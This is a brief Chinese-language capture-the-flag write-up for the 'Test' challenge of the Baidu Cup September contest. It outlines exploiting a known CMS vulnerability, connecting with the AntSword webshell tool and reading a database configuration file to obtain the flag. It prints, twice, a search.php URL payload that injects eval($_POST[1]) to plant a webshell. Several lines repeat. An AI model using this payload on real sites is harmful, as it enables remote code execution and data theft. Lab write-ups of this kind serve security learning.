“百度杯”CTF比赛 九月场_Test_WriteUp
打开网站
考点:已知CMS漏洞利用
在线搜索exploit
成功利用
蚁剑连接成功
找到flag
数据库配置文件
成功连接数据库 ,获得flag
payload
http://xxxxx/search.php?searchtype=5&tid=&area=eval($_POST[1])
考点:已知CMS漏洞利用
蚁剑连接成功
数据库配置文件
成功连接数据库 ,获得flag
http://xxxxx/search.php?searchtype=5&tid=&area=eval($_POST[1])